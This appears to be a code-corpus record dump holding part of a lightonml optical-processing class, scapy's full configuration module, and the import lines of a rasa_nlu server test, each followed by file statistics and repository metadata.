.. warning:: when making several transform calls, prefer calling `fit1d`
and then `transform`, or you might encounter an inconsistency in the
transformation matrix.
The input data can be bit-packed, where ``n_features = 8*X.shape[-1]``
Otherwise ``n_features = X.shape[-1]``
If tqdm module is available, it is used for progress display
Parameters
----------
X: np.ndarray or torch.Tensor
a 1d input vector, or batch of 1d input_vectors, binary encoded, packed or not
batch can be 1d or 2d. In all cases ``output.shape[:-1] = X.shape[:-1]``
packed: bool, optional
whether the input data is in bit-packed representation
defaults to False
override: keyword args for overriding transform settings (advanced parameters)
Returns
-------
Y: np.ndarray or torch.Tensor
complete array of nonlinear random projections of X,
of size self.n_components
If input is an ndarray, type is actually ContextArray,
with a context attribute to add metadata
"""
self.fit1d(X, None, packed, False, **override)
return self.transform(X)
def fit_transform2d(self, X, packed: bool = False, n_2d_features=None,
**override) -> ContextArray:
"""Performs the nonlinear random projections of 2d input vector(s).
This function is the one-liner equivalent of `fit2d` and `transform` calls.
.. warning:: when making several transform calls, prefer calling `fit2d`
and then `transform`, or you might encounter an inconsistency in the
transformation matrix.
If tqdm module is available, it is used for progress display
Parameters
----------
X: np.ndarray or torch.Tensor
a 2d input vector, or batch of 2d input_vectors, binary encoded, packed or not
packed: bool, optional
whether the input data is in bit-packed representation
if True, each input vector is assumed to be a 1d array, and the "real" number
of features must be provided as n_2d_features
defaults to False
n_2d_features: list, tuple or np.ndarray of length 2
If the input is bit-packed, specifies the shape of each input vector.
Not needed if the input isn't bit-packed.
override: keyword args for overriding transform settings (advanced parameters)
Returns
-------
Y: np.ndarray or torch.Tensor
complete array of nonlinear random projections of X,
of size self.n_components
If input is an ndarray, type is actually ContextArray,
with a context attribute to add metadata
"""
self.fit2d(X, n_2d_features, packed, False, **override)
return self.transform(X)
def __fit(self, X, n_features: IntOrTuple,
packed: bool, online: bool, is_2d_features: bool,
**override):
"""Internal working of the fitXd calls
Instantiates a TransformRunner, and start online acq if needs be.
"""
if X is not None:
# Input is provided, do the fit with user input
user_input = OpuUserInput.from_input(X, packed, is_2d_features, n_features)
tr_settings = self._tr_settings(no_input=False, **override)
self._runner = FitTransformRunner(self._s, tr_settings, user_input,
device=self.device,
disable_pbar=self.disable_pbar)
else:
# Only dimensions are provided, no fitting happens on input
assert n_features, "either input vector or n_features must be specified"
# tr_settings has no input_roi, since it uses X to compute it
tr_settings = self._tr_settings(no_input=True, **override)
traits = InputTraits(n_features, packed)
self._runner = TransformRunner(self._s, tr_settings, traits,
device=self.device,
disable_pbar=self.disable_pbar)
self._acq_stack.close()
if online:
if self._s.no_single_transform:
raise RuntimeError("Online transform isn't available with this OPU")
# Start acquisition only if online. Batch transform start their own.
self._acq_stack.enter_context(self.device.acquiring(online=True))
@staticmethod
def _post_transform(output, user_input, encoder, decoder_cls):
"""Final steps after transform
1. reshape
2. decode the output
3. convert to tensor if user input was tensor
"""
output = user_input.reshape_output(output)
# If encoder has get_params method, it's for transmitting it to decoder init
if inspect.isclass(decoder_cls):
if hasattr(encoder, "get_params"):
decoder = decoder_cls(**encoder.get_params())
else:
decoder = decoder_cls()
else:
decoder = decoder_cls
output = decoder.transform(output)
if user_input.is_tensor:
# noinspection PyPackageRequirements,PyUnresolvedReferences
import torch
return torch.from_numpy(output)
else:
return output
def _raw_linear_transform(self, X, traits=None, user_input=None):
"""
Do linear_transform of X, and return both raw OPU output and decoded output in a tuple
"""
if traits is None:
assert self._runner, "Call fit1d or fit2d before linear_transform"
traits = self._runner.traits
if user_input is None:
user_input = OpuUserInput.from_traits(X, traits)
if self._s.simulated:
prepared_X = X
else:
assert self.device.acq_state.value != AcqState.online.value, \
"Can't do linear transform when acquisition is" \
" in online mode, only single vectors"
assert self._runner.t.input_roi_strategy == InputRoiStrategy.full, \
"ROI strategy must be full for linear_transform to be correct.\n" \
"Set input_roi_strategy attribute to InputRoiStrategy.full."
# X2 is now numpy 2D, whatever the initial shape and the type (torch or numpy)
X2 = user_input.reshape_input(raveled_features=True, leave_single_dim=True)
try:
import lightonopu.linear_reconstruction as reconstruction
except ImportError:
raise RuntimeError("Need a lightonopu version with linear_reconstruction module")
start = time.time()
prepared_X = reconstruction.encode_batch(X2)
self._trace(f"Encoding time {time.time() - start} s")
# Restore the dimension after batch encoding to something suitable for formatting
prepared_X = user_input.unravel_features(prepared_X)
# Run the OPU transform
prepared_input = OpuUserInput.from_traits(prepared_X, traits)
start = time.time()
with self.device.acquiring(n_images=self._s.n_samples_by_pass):
rp_opu = self._runner.transform(prepared_input, linear=True)
self._trace(f"Transform time {time.time() - start} s")
if self._s.simulated:
result_ctx = rp_opu
else:
# Decoding forgets about the context, re-add it to result afterwards
start = time.time()
result = reconstruction.decode_batch(rp_opu)
self._trace(f"Decoding time {time.time() - start} s")
result_ctx = ContextArray(result, rp_opu.context)
return rp_opu, result_ctx
def __enter__(self):
"""Context manager interface that acquires hardware resources
used by the OPU device."""
self.__active_before_enter = self.device.active
self.open()
return self
def __exit__(self, *args):
# Don't close if OPU was already active
if not self.__active_before_enter:
self.close()
def open(self):
"""Acquires hardware resources used by the OPU device
.. seealso:: `close()` or use the context manager interface for
closing at the end af an indent block
"""
if self.device.active:
return
self.device.open()
# initial reservation for giving batch transforms a buffer ready to use
self.device.reserve(self._s.n_samples_by_pass)
if self._s.detect_trigger:
# Detect trigger issue, and take action if needed
issue = utils.detect_trigger_issue(self.device)
if issue:
# noinspection PyProtectedMember,PyUnresolvedReferences
self.device._OpuDevice__opu.nb_prelim = 1
self._debug("trigger issue detected, workaround applied")
else:
self._debug("trigger issue not detected")
self._debug("OPU opened")
def close(self):
"""Releases hardware resources used by the OPU device"""
self._acq_stack.close()
self.device.close()
self._debug("OPU closed")
@property
def config(self):
"""Returns the internal configuration object"""
# Load it when asked first time
if not self.__opu_config:
self.__opu_config = config.load_config(self.__config_file, self._trace)
if self.__config_override is not None:
utils.recurse_update(self.__opu_config, self.__config_override)
return self.__opu_config
@property
def rescale(self):
return self._rescale
@rescale.setter
def rescale(self, value):
# If str it's the enum value
if isinstance(value, str):
self._rescale = OutputRescaling[value.lower()]
else:
assert isinstance(value, OutputRescaling)
self._rescale = value
@property
def max_n_components(self):
return self._output_roi.max_components
@property
def n_components(self) -> int:
return self._n_components
@n_components.setter
def n_components(self, value: int):
if self._s.simulated:
self._resize_rnd_matrix(self.max_n_features, value)
else:
self.device.output_roi = self._output_roi.compute_roi(value)
# We used to call device.reserve here, but moved to device.acquiring()
self._n_components = value
@property
def max_n_features(self) -> int:
return self._s.max_n_features
@max_n_features.setter
def max_n_features(self, value: int):
if not self._s.simulated:
raise AttributeError("max_n_feature can't be set if device is real")
self._resize_rnd_matrix(value, self._n_components)
self._max_n_features = value
@property
def _s(self) -> OpuSettings:
"""Returns immutable settings associated with the OPU
Settings are immutable (attrs frozen), so generate it at
each call. Performance impact is negligible"""
# Get default value
pass_default = attr.fields(OpuSettings).n_samples_by_pass.default
# Common settings to both simulated and base
kwargs = {"input_shape": self.device.input_shape,
"output_max_shape": self.device.output_shape_max,
"frametime_us": self._base_frametime_us,
"exposure_us": self._base_exposure_us}
if isinstance(self.device, SimulatedOpuDevice):
# Notice we never query self.config here, in order not to
# need a configuration file for simulated device
return OpuSettings(max_n_features=self._max_n_features,
n_samples_by_pass=pass_default,
simulated=True, **kwargs
)
return OpuSettings(
max_n_features=int(np.prod(self.device.input_shape)),
# Will use defaults of OpuSettings if not found
n_samples_by_pass=self.config.get("n_samples_by_pass", pass_default),
min_batch_size=self.config["input"].get("minimum_batch_size", 0),
allowed_roi=self.config["output"].get("allowed_roi"),
# min_n_components is linked to the minimum output size
min_n_components=self.config["output"].get("minimum_output_size", 0),
ones_range=self.config["ones_range"],
n_tries=self.config.get("n_transform_tries", 5),
detect_trigger=self.config.get("detect_trigger_issue", False),
no_single_transform=self.config.get("no_single_transform", False),
stdev=self.config["output"].get("stdev", 1.),
**kwargs)
def _resize_rnd_matrix(self, n_features: int, n_components: int):
"""Resize device's random matrix"""
assert isinstance(self.device, SimulatedOpuDevice)
rnd_mat = self.device.random_matrix
if rnd_mat is None or rnd_mat.shape != (n_features, n_components):
self._print("OPU: computing the random matrix... ", end='', flush=True)
self.device.build_random_matrix(n_features, n_components)
self._print("OK")
def version(self, devices=False):
"""Returns a multi-line string containing name and versions of the OPU"""
version = []
# Build OPU name
if not self._s.simulated:
version.append(opu_version(self.__opu_config))
# module version
version.append(f"lightonml version {lightonml.__version__}")
try:
# noinspection PyUnresolvedReferences
import lightonopu
version.append(f"lightonopu version {lightonopu.__version__}")
except ImportError:
pass
if devices:
version.append(self.device.versions())
return '\n'.join(version)
def __getstate__(self):
state = self.__dict__.copy()
# Remove logging functions, they can't be pickled
state.pop("_debug")
state.pop("_trace")
state.pop("_print")
# acq stack can't be pickled, will be restored
state.pop("_acq_stack")
# If acquisition is ongoing, close it
if not self._s.simulated:
state["__online_acq"] = self.device.acq_state.value == AcqState.online.value
self._acq_stack.close()
# Device itself is closed on pickling
return state
def __setstate__(self, state):
self.__dict__.update(state)
# Restore logging functions removed at getstate
self._debug = lightonml.get_debug_fn()
self._trace = lightonml.get_trace_fn()
self._print = lightonml.get_print_fn()
self._acq_stack = ExitStack()
# Restore online acquisition if it was the case
if state.get("__online_acq", False):
self._acq_stack.enter_context(self.device.acquiring(online=True))
| 44.319838
| 114
| 0.645595
| 4,068
| 32,841
| 5.048673
| 0.146264
| 0.017528
| 0.009933
| 0.00779
| 0.384069
| 0.334989
| 0.304996
| 0.300224
| 0.282063
| 0.262392
| 0
| 0.004078
| 0.283152
| 32,841
| 740
| 115
| 44.37973
| 0.86832
| 0.392832
| 0
| 0.23796
| 0
| 0
| 0.114696
| 0.007588
| 0
| 0
| 0
| 0.001351
| 0.031161
| 1
| 0.084986
| false
| 0.022663
| 0.07932
| 0.011331
| 0.226629
| 0.014164
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e5a12f0690f68a0f2da693b51965dfe681eeea
| 22,938
|
py
|
Python
|
scripts/external_libs/scapy-2.4.3/scapy/config.py
|
timgates42/trex-core
|
efe94752fcb2d0734c83d4877afe92a3dbf8eccd
|
[
"Apache-2.0"
] | 956
|
2015-06-24T15:04:55.000Z
|
2022-03-30T06:25:04.000Z
|
scripts/external_libs/scapy-2.4.3/scapy/config.py
|
angelyouyou/trex-core
|
fddf78584cae285d9298ef23f9f5c8725e16911e
|
[
"Apache-2.0"
] | 782
|
2015-09-20T15:19:00.000Z
|
2022-03-31T23:52:05.000Z
|
scripts/external_libs/scapy-2.4.3/scapy/config.py
|
angelyouyou/trex-core
|
fddf78584cae285d9298ef23f9f5c8725e16911e
|
[
"Apache-2.0"
] | 429
|
2015-06-27T19:34:21.000Z
|
2022-03-23T11:02:51.000Z
|
# This file is part of Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Philippe Biondi <phil@secdev.org>
# This program is published under a GPLv2 license
"""
Implementation of the configuration object.
"""
from __future__ import absolute_import
from __future__ import print_function
import functools
import os
import re
import time
import socket
import sys
from scapy import VERSION, base_classes
from scapy.consts import DARWIN, WINDOWS, LINUX, BSD, SOLARIS
from scapy.error import log_scapy, warning, ScapyInvalidPlatformException
from scapy.modules import six
from scapy.themes import NoTheme, apply_ipython_style
############
# Config #
############
class ConfClass(object):
def configure(self, cnf):
self.__dict__ = cnf.__dict__.copy()
def __repr__(self):
return str(self)
def __str__(self):
s = ""
keys = self.__class__.__dict__.copy()
keys.update(self.__dict__)
keys = sorted(keys)
for i in keys:
if i[0] != "_":
r = repr(getattr(self, i))
r = " ".join(r.split())
wlen = 76 - max(len(i), 10)
if len(r) > wlen:
r = r[:wlen - 3] + "..."
s += "%-10s = %s\n" % (i, r)
return s[:-1]
class Interceptor(object):
def __init__(self, name=None, default=None,
hook=None, args=None, kargs=None):
self.name = name
self.intname = "_intercepted_%s" % name
self.default = default
self.hook = hook
self.args = args if args is not None else []
self.kargs = kargs if kargs is not None else {}
def __get__(self, obj, typ=None):
if not hasattr(obj, self.intname):
setattr(obj, self.intname, self.default)
return getattr(obj, self.intname)
@staticmethod
def set_from_hook(obj, name, val):
int_name = "_intercepted_%s" % name
setattr(obj, int_name, val)
def __set__(self, obj, val):
setattr(obj, self.intname, val)
self.hook(self.name, val, *self.args, **self.kargs)
def _readonly(name):
default = Conf.__dict__[name].default
Interceptor.set_from_hook(conf, name, default)
raise ValueError("Read-only value !")
ReadOnlyAttribute = functools.partial(
Interceptor,
hook=(lambda name, *args, **kwargs: _readonly(name))
)
ReadOnlyAttribute.__doc__ = "Read-only class attribute"
class ProgPath(ConfClass):
universal_open = "open" if DARWIN else "xdg-open"
pdfreader = universal_open
psreader = universal_open
svgreader = universal_open
dot = "dot"
display = "display"
tcpdump = "tcpdump"
tcpreplay = "tcpreplay"
hexedit = "hexer"
tshark = "tshark"
wireshark = "wireshark"
ifconfig = "ifconfig"
class ConfigFieldList:
def __init__(self):
self.fields = set()
self.layers = set()
@staticmethod
def _is_field(f):
return hasattr(f, "owners")
def _recalc_layer_list(self):
self.layers = {owner for f in self.fields for owner in f.owners}
def add(self, *flds):
self.fields |= {f for f in flds if self._is_field(f)}
self._recalc_layer_list()
def remove(self, *flds):
self.fields -= set(flds)
self._recalc_layer_list()
def __contains__(self, elt):
if isinstance(elt, base_classes.Packet_metaclass):
return elt in self.layers
return elt in self.fields
def __repr__(self):
return "<%s [%s]>" % (self.__class__.__name__, " ".join(str(x) for x in self.fields)) # noqa: E501
class Emphasize(ConfigFieldList):
pass
class Resolve(ConfigFieldList):
pass
class Num2Layer:
def __init__(self):
self.num2layer = {}
self.layer2num = {}
def register(self, num, layer):
self.register_num2layer(num, layer)
self.register_layer2num(num, layer)
def register_num2layer(self, num, layer):
self.num2layer[num] = layer
def register_layer2num(self, num, layer):
self.layer2num[layer] = num
def __getitem__(self, item):
if isinstance(item, base_classes.Packet_metaclass):
return self.layer2num[item]
return self.num2layer[item]
def __contains__(self, item):
if isinstance(item, base_classes.Packet_metaclass):
return item in self.layer2num
return item in self.num2layer
def get(self, item, default=None):
return self[item] if item in self else default
def __repr__(self):
lst = []
for num, layer in six.iteritems(self.num2layer):
if layer in self.layer2num and self.layer2num[layer] == num:
dir = "<->"
else:
dir = " ->"
lst.append((num, "%#6x %s %-20s (%s)" % (num, dir, layer.__name__,
layer._name)))
for layer, num in six.iteritems(self.layer2num):
if num not in self.num2layer or self.num2layer[num] != layer:
lst.append((num, "%#6x <- %-20s (%s)" % (num, layer.__name__,
layer._name)))
lst.sort()
return "\n".join(y for x, y in lst)
class LayersList(list):
def __init__(self):
list.__init__(self)
self.ldict = {}
def __repr__(self):
return "\n".join("%-20s: %s" % (l.__name__, l.name) for l in self)
def register(self, layer):
self.append(layer)
if layer.__module__ not in self.ldict:
self.ldict[layer.__module__] = []
self.ldict[layer.__module__].append(layer)
def layers(self):
result = []
# This import may feel useless, but it is required for the eval below
import scapy # noqa: F401
for lay in self.ldict:
doc = eval(lay).__doc__
result.append((lay, doc.strip().split("\n")[0] if doc else lay))
return result
class CommandsList(list):
def __repr__(self):
s = []
for l in sorted(self, key=lambda x: x.__name__):
doc = l.__doc__.split("\n")[0] if l.__doc__ else "--"
s.append("%-20s: %s" % (l.__name__, doc))
return "\n".join(s)
def register(self, cmd):
self.append(cmd)
return cmd # return cmd so that method can be used as a decorator
def lsc():
"""Displays Scapy's default commands"""
print(repr(conf.commands))
class CacheInstance(dict, object):
__slots__ = ["timeout", "name", "_timetable", "__dict__"]
def __init__(self, name="noname", timeout=None):
self.timeout = timeout
self.name = name
self._timetable = {}
def flush(self):
self.__init__(name=self.name, timeout=self.timeout)
def __getitem__(self, item):
if item in self.__slots__:
return object.__getattribute__(self, item)
val = dict.__getitem__(self, item)
if self.timeout is not None:
t = self._timetable[item]
if time.time() - t > self.timeout:
raise KeyError(item)
return val
def get(self, item, default=None):
# overloading this method is needed to force the dict to go through
# the timetable check
try:
return self[item]
except KeyError:
return default
def __setitem__(self, item, v):
if item in self.__slots__:
return object.__setattr__(self, item, v)
self._timetable[item] = time.time()
dict.__setitem__(self, item, v)
def update(self, other):
for key, value in six.iteritems(other):
# We only update an element from `other` either if it does
# not exist in `self` or if the entry in `self` is older.
if key not in self or self._timetable[key] < other._timetable[key]:
dict.__setitem__(self, key, value)
self._timetable[key] = other._timetable[key]
def iteritems(self):
if self.timeout is None:
return six.iteritems(self.__dict__)
t0 = time.time()
return ((k, v) for (k, v) in six.iteritems(self.__dict__) if t0 - self._timetable[k] < self.timeout) # noqa: E501
def iterkeys(self):
if self.timeout is None:
return six.iterkeys(self.__dict__)
t0 = time.time()
return (k for k in six.iterkeys(self.__dict__) if t0 - self._timetable[k] < self.timeout) # noqa: E501
def __iter__(self):
return six.iterkeys(self.__dict__)
def itervalues(self):
if self.timeout is None:
return six.itervalues(self.__dict__)
t0 = time.time()
return (v for (k, v) in six.iteritems(self.__dict__) if t0 - self._timetable[k] < self.timeout) # noqa: E501
def items(self):
if self.timeout is None:
return dict.items(self)
t0 = time.time()
return [(k, v) for (k, v) in six.iteritems(self.__dict__) if t0 - self._timetable[k] < self.timeout] # noqa: E501
def keys(self):
if self.timeout is None:
return dict.keys(self)
t0 = time.time()
return [k for k in six.iterkeys(self.__dict__) if t0 - self._timetable[k] < self.timeout] # noqa: E501
def values(self):
if self.timeout is None:
return list(six.itervalues(self))
t0 = time.time()
return [v for (k, v) in six.iteritems(self.__dict__) if t0 - self._timetable[k] < self.timeout] # noqa: E501
def __len__(self):
if self.timeout is None:
return dict.__len__(self)
return len(self.keys())
def summary(self):
return "%s: %i valid items. Timeout=%rs" % (self.name, len(self), self.timeout) # noqa: E501
def __repr__(self):
s = []
if self:
mk = max(len(k) for k in six.iterkeys(self.__dict__))
fmt = "%%-%is %%s" % (mk + 1)
for item in six.iteritems(self.__dict__):
s.append(fmt % item)
return "\n".join(s)
class NetCache:
def __init__(self):
self._caches_list = []
def add_cache(self, cache):
self._caches_list.append(cache)
setattr(self, cache.name, cache)
def new_cache(self, name, timeout=None):
c = CacheInstance(name=name, timeout=timeout)
self.add_cache(c)
def __delattr__(self, attr):
raise AttributeError("Cannot delete attributes")
def update(self, other):
for co in other._caches_list:
if hasattr(self, co.name):
getattr(self, co.name).update(co)
else:
self.add_cache(co.copy())
def flush(self):
for c in self._caches_list:
c.flush()
def __repr__(self):
return "\n".join(c.summary() for c in self._caches_list)
def _version_checker(module, minver):
"""Checks that module has a higher version that minver.
params:
- module: a module to test
- minver: a tuple of versions
"""
# We could use LooseVersion, but distutils imports imp which is deprecated
version_regexp = r'[a-z]?((?:\d|\.)+\d+)(?:\.dev[0-9]+)?'
version_tags = re.match(version_regexp, module.__version__)
if not version_tags:
return False
version_tags = version_tags.group(1).split(".")
version_tags = tuple(int(x) for x in version_tags)
return version_tags >= minver
def isCryptographyValid():
"""
Check if the cryptography library is present, and if it is recent enough
for most usages in scapy (v1.7 or later).
"""
try:
import cryptography
except ImportError:
return False
return _version_checker(cryptography, (1, 7))
def isCryptographyRecent():
"""
Check if the cryptography library is recent (2.0 and later)
"""
try:
import cryptography
except ImportError:
return False
return _version_checker(cryptography, (2, 0))
def isCryptographyAdvanced():
"""
Check if the cryptography library is present, and if it supports X25519,
ChaCha20Poly1305 and such (v2.0 or later).
"""
try:
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey # noqa: E501
X25519PrivateKey.generate()
except Exception:
return False
else:
return True
def isPyPy():
"""Returns either scapy is running under PyPy or not"""
try:
import __pypy__ # noqa: F401
return True
except ImportError:
return False
def _prompt_changer(attr, val):
"""Change the current prompt theme"""
try:
sys.ps1 = conf.color_theme.prompt(conf.prompt)
except Exception:
pass
try:
apply_ipython_style(get_ipython())
except NameError:
pass
def _set_conf_sockets():
"""Populate the conf.L2Socket and conf.L3Socket
according to the various use_* parameters
"""
from scapy.main import _load
if conf.use_bpf and not BSD:
Interceptor.set_from_hook(conf, "use_bpf", False)
raise ScapyInvalidPlatformException("BSD-like (OSX, *BSD...) only !")
if not conf.use_pcap and SOLARIS:
Interceptor.set_from_hook(conf, "use_pcap", True)
raise ScapyInvalidPlatformException(
"Scapy only supports libpcap on Solaris !"
)
# we are already in an Interceptor hook, use Interceptor.set_from_hook
if conf.use_pcap or conf.use_dnet:
try:
from scapy.arch.pcapdnet import L2pcapListenSocket, L2pcapSocket, \
L3pcapSocket
except (OSError, ImportError):
warning("No libpcap provider available ! pcap won't be used")
Interceptor.set_from_hook(conf, "use_pcap", False)
else:
conf.L3socket = L3pcapSocket
conf.L3socket6 = functools.partial(L3pcapSocket, filter="ip6")
conf.L2socket = L2pcapSocket
conf.L2listen = L2pcapListenSocket
# Update globals
_load("scapy.arch.pcapdnet")
return
if conf.use_bpf:
from scapy.arch.bpf.supersocket import L2bpfListenSocket, \
L2bpfSocket, L3bpfSocket
conf.L3socket = L3bpfSocket
conf.L3socket6 = functools.partial(L3bpfSocket, filter="ip6")
conf.L2socket = L2bpfSocket
conf.L2listen = L2bpfListenSocket
# Update globals
_load("scapy.arch.bpf")
return
if LINUX:
from scapy.arch.linux import L3PacketSocket, L2Socket, L2ListenSocket
conf.L3socket = L3PacketSocket
conf.L3socket6 = functools.partial(L3PacketSocket, filter="ip6")
conf.L2socket = L2Socket
conf.L2listen = L2ListenSocket
# Update globals
_load("scapy.arch.linux")
return
if WINDOWS:
from scapy.arch.windows import _NotAvailableSocket
from scapy.arch.windows.native import L3WinSocket, L3WinSocket6
conf.L3socket = L3WinSocket
conf.L3socket6 = L3WinSocket6
conf.L2socket = _NotAvailableSocket
conf.L2listen = _NotAvailableSocket
# No need to update globals on Windows
return
from scapy.supersocket import L3RawSocket
from scapy.layers.inet6 import L3RawSocket6
conf.L3socket = L3RawSocket
conf.L3socket6 = L3RawSocket6
def _socket_changer(attr, val):
if not isinstance(val, bool):
raise TypeError("This argument should be a boolean")
dependencies = { # Things that will be turned off
"use_pcap": ["use_bpf"],
"use_bpf": ["use_pcap"],
}
restore = {k: getattr(conf, k) for k in dependencies}
del restore[attr] # This is handled directly by _set_conf_sockets
if val: # Only if True
for param in dependencies[attr]:
Interceptor.set_from_hook(conf, param, False)
try:
_set_conf_sockets()
except (ScapyInvalidPlatformException, ImportError) as e:
for key, value in restore.items():
Interceptor.set_from_hook(conf, key, value)
if isinstance(e, ScapyInvalidPlatformException):
raise
def _loglevel_changer(attr, val):
"""Handle a change of conf.logLevel"""
log_scapy.setLevel(val)
class Conf(ConfClass):
"""This object contains the configuration of Scapy.
session : filename where the session will be saved
interactive_shell : can be "ipython", "python" or "auto". Default: Auto
stealth : if 1, prevents any unwanted packet to go out (ARP, DNS, ...)
checkIPID: if 0, doesn't check that IPID matches between IP sent and ICMP IP citation received # noqa: E501
if 1, checks that they either are equal or byte swapped equals (bug in some IP stacks) # noqa: E501
if 2, strictly checks that they are equals
checkIPsrc: if 1, checks IP src in IP and ICMP IP citation match (bug in some NAT stacks) # noqa: E501
checkIPinIP: if True, checks that IP-in-IP layers match. If False, do not
check IP layers that encapsulates another IP layer
check_TCPerror_seqack: if 1, also check that TCP seq and ack match the ones in ICMP citation # noqa: E501
iff : selects the default output interface for srp() and sendp(). default:"eth0") # noqa: E501
verb : level of verbosity, from 0 (almost mute) to 3 (verbose)
promisc : default mode for listening socket (to get answers if you spoof on a lan) # noqa: E501
sniff_promisc : default mode for sniff()
filter : bpf filter added to every sniffing socket to exclude traffic from analysis # noqa: E501
histfile : history file
padding : includes padding in disassembled packets
except_filter : BPF filter for packets to ignore
debug_match : when 1, store received packet that are not matched into debug.recv # noqa: E501
route : holds the Scapy routing table and provides methods to manipulate it
warning_threshold : how much time between warnings from the same place
ASN1_default_codec: Codec used by default for ASN1 objects
mib : holds MIB direct access dictionary
resolve : holds list of fields for which resolution should be done
noenum : holds list of enum fields for which conversion to string should NOT be done # noqa: E501
AS_resolver: choose the AS resolver class to use
extensions_paths: path or list of paths where extensions are to be looked for
contribs : a dict which can be used by contrib layers to store local configuration # noqa: E501
debug_tls:When 1, print some TLS session secrets when they are computed.
recv_poll_rate: how often to check for new packets. Defaults to 0.05s.
"""
version = ReadOnlyAttribute("version", VERSION)
session = ""
interactive = False
interactive_shell = ""
stealth = "not implemented"
iface = None
iface6 = None
layers = LayersList()
commands = CommandsList()
dot15d4_protocol = None # Used in dot15d4.py
logLevel = Interceptor("logLevel", log_scapy.level, _loglevel_changer)
checkIPID = False
checkIPsrc = True
checkIPaddr = True
checkIPinIP = True
check_TCPerror_seqack = False
verb = 2
prompt = Interceptor("prompt", ">>> ", _prompt_changer)
promisc = True
sniff_promisc = 1
raw_layer = None
raw_summary = False
default_l2 = None
l2types = Num2Layer()
l3types = Num2Layer()
L3socket = None
L3socket6 = None
L2socket = None
L2listen = None
BTsocket = None
USBsocket = None
min_pkt_size = 60
bufsize = 2**16
histfile = os.getenv('SCAPY_HISTFILE',
os.path.join(os.path.expanduser("~"),
".scapy_history"))
padding = 1
except_filter = ""
debug_match = False
debug_tls = False
wepkey = ""
cache_iflist = {}
route = None # Filed by route.py
route6 = None # Filed by route6.py
auto_fragment = True
debug_dissector = False
color_theme = Interceptor("color_theme", NoTheme(), _prompt_changer)
warning_threshold = 5
prog = ProgPath()
resolve = Resolve()
noenum = Resolve()
emph = Emphasize()
use_pypy = ReadOnlyAttribute("use_pypy", isPyPy())
use_pcap = Interceptor(
"use_pcap",
os.getenv("SCAPY_USE_PCAPDNET", "").lower().startswith("y"),
_socket_changer
)
# XXX use_dnet is deprecated
use_dnet = os.getenv("SCAPY_USE_PCAPDNET", "").lower().startswith("y")
use_bpf = Interceptor("use_bpf", False, _socket_changer)
use_npcap = False
ipv6_enabled = socket.has_ipv6
extensions_paths = "."
stats_classic_protocols = []
stats_dot11_protocols = []
temp_files = []
netcache = NetCache()
geoip_city = None
# can, tls, http are not loaded by default
load_layers = ['bluetooth', 'bluetooth4LE', 'dhcp', 'dhcp6', 'dns',
'dot11', 'dot15d4', 'eap', 'gprs', 'hsrp', 'inet',
'inet6', 'ipsec', 'ir', 'isakmp', 'l2', 'l2tp',
'llmnr', 'lltd', 'mgcp', 'mobileip', 'netbios',
'netflow', 'ntp', 'ppi', 'ppp', 'pptp', 'radius', 'rip',
'rtp', 'sctp', 'sixlowpan', 'skinny', 'smb', 'snmp',
'tftp', 'vrrp', 'vxlan', 'x509', 'zigbee']
contribs = dict()
crypto_valid = isCryptographyValid()
crypto_valid_recent = isCryptographyRecent()
crypto_valid_advanced = crypto_valid_recent and isCryptographyAdvanced()
fancy_prompt = True
auto_crop_tables = True
recv_poll_rate = 0.05
def __getattr__(self, attr):
# Those are loaded on runtime to avoid import loops
if attr == "manufdb":
from scapy.data import MANUFDB
return MANUFDB
if attr == "ethertypes":
from scapy.data import ETHER_TYPES
return ETHER_TYPES
if attr == "protocols":
from scapy.data import IP_PROTOS
return IP_PROTOS
if attr == "services_udp":
from scapy.data import UDP_SERVICES
return UDP_SERVICES
if attr == "services_tcp":
from scapy.data import TCP_SERVICES
return TCP_SERVICES
return object.__getattr__(self, attr)
if not Conf.ipv6_enabled:
log_scapy.warning("IPv6 support disabled in Python. Cannot load Scapy IPv6 layers.") # noqa: E501
for m in ["inet6", "dhcp6"]:
if m in Conf.load_layers:
Conf.load_layers.remove(m)
conf = Conf()
def crypto_validator(func):
"""
This a decorator to be used for any method relying on the cryptography library. # noqa: E501
Its behaviour depends on the 'crypto_valid' attribute of the global 'conf'.
"""
def func_in(*args, **kwargs):
if not conf.crypto_valid:
raise ImportError("Cannot execute crypto-related method! "
"Please install python-cryptography v1.7 or later.") # noqa: E501
return func(*args, **kwargs)
return func_in
| 33.584187
| 122
| 0.624161
| 2,856
| 22,938
| 4.82423
| 0.22479
| 0.012774
| 0.006387
| 0.00871
| 0.146973
| 0.119756
| 0.097692
| 0.085426
| 0.06358
| 0.06358
| 0
| 0.017981
| 0.275046
| 22,938
| 682
| 123
| 33.633431
| 0.810572
| 0.187287
| 0
| 0.171717
| 0
| 0
| 0.064815
| 0.002007
| 0
| 0
| 0
| 0
| 0
| 1
| 0.131313
| false
| 0.008081
| 0.074747
| 0.016162
| 0.523232
| 0.00404
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e70f438163ee68472f800dcc1f45bfb446e30f
| 5,797
|
py
|
Python
|
tests/base/test_server.py
|
Prodigy123/rasa_nlu_zh
|
b85717063a493f6b148504ee550a0642c6c379ae
|
[
"Apache-2.0"
] | 4
|
2017-07-20T03:06:29.000Z
|
2021-04-20T03:25:17.000Z
|
tests/base/test_server.py
|
imsakshi/rasa_nlu
|
6dafc37825b99139248fdea9e9745f416734d4dd
|
[
"Apache-2.0"
] | null | null | null |
tests/base/test_server.py
|
imsakshi/rasa_nlu
|
6dafc37825b99139248fdea9e9745f416734d4dd
|
[
"Apache-2.0"
] | 2
|
2017-10-03T00:56:22.000Z
|
2018-08-15T10:41:41.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import tempfile
import pytest
import time
from treq.testing import StubTreq
from rasa_nlu.config import RasaNLUConfig
import json
import io
from tests import utilities
from tests.utilities import ResponseTest
from rasa_nlu.server import RasaNLU
